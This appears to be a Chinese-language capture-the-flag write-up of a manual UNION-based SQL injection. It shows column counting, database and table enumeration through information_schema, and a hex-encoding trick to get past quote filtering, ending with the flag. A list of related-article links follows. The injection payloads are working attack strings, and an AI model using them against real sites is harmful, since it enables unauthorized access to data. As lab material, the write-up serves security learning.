實戰1-注入
order by 19%23
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
第二位有顯示位,可以用聯合查詢爆出表名
and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
資料庫為 interplay
and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema='interplay'%23
網頁報錯,說明單引號被過濾
and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=0x696e746572706c6179%23
banners,banners_banner_id_seq,careers,careers_career_id_seq,downloads,franchises,franchises_franchise_id_seq,news,news_news_id_seq,screenshots,screenshots_screenshot_id_seq,titles,titles_title_id_seq
資料庫
的第一個表為banners
即flag為 flag{banners}
相關文章
- 實戰2-注入
- Laravel —— 服務注入實戰案例Laravel
- Windows提權實戰————4、DLL注入Windows
- 【Spring實戰】—— 2 構造注入Spring
- .NET Core 實戰筆記1-介紹和安裝筆記
- 實驗1-
- Django實戰1-許可權管理功能實現-04:系統入口Django
- Django實戰1-許可權管理功能實現-02:專案設定Django
- 實戰記錄之SQL server報錯手工注入SQLServer
- Kustomize 生產實戰-注入監控 APM Agent
- 日誌系統實戰(一)—AOP靜態注入
- Django實戰1-許可權管理功能實現-01:搭建開發環境Django開發環境
- Django實戰1-許可權管理功能實現-03:使用者認證Django
- PYTHON 實戰完整教程1-配置VSCode開發環境PythonVSCode開發環境
- Python - Kaggle實戰篇1- 為什麼選擇KagglePython
- nestjs後端開發實戰(一)——依賴注入JS後端依賴注入
- 【半小時大話.net依賴注入】(一)理論基礎+實戰控制檯程式實現AutoFac注入依賴注入
- .Net Core後端架構實戰【1-專案分層框架設計】後端架構框架
- 實驗1-波士頓房價預測
- java初學demo坦克大戰1-展示一個視窗Java
- XML實體注入漏洞XML
- 【半小時大話.net依賴注入】(下)詳解AutoFac+實戰Mvc、Api以及.NET Core的依賴注入依賴注入MVCAPI
- 1-類
- 【深入淺出Spring原理及實戰】「原始碼原理實戰」從底層角度去分析研究PropertySourcesPlaceholderConfigurer的原理及實戰注入機制Spring原始碼
- 實戰指南:使用 xUnit.DependencyInjection 在單元測試中實現依賴注入【完整教程】依賴注入
- iOS實現依賴注入iOS依賴注入
- 依賴注入?依賴注入是如何實現解耦的?依賴注入解耦
- 1-簡介
- Redis核心原理及讀寫一致企業級架構深入剖析1-綜合元件環境實戰Redis架構元件
- Vue路由自動注入實踐Vue路由
- PHP 依賴注入容器實現PHP依賴注入
- 依賴注入實現元件化依賴注入元件化
- 【Python3網路爬蟲開發實戰】6-Ajax資料爬取-1-什麼是AjaxPython爬蟲
- 檢索增強生成(Retrieval-augmented Generation,RAG)實戰1-基於LlamaIndex構建第一個RAG應用AIIndex
- Spring注入:配置注入(set注入和構造器注入)與註解注入Spring
- 1-線性模型模型
- RxFluxArchitecture框架介紹1-基本功能實現UX框架
- buffer cache實驗1-記憶體結構圖解記憶體圖解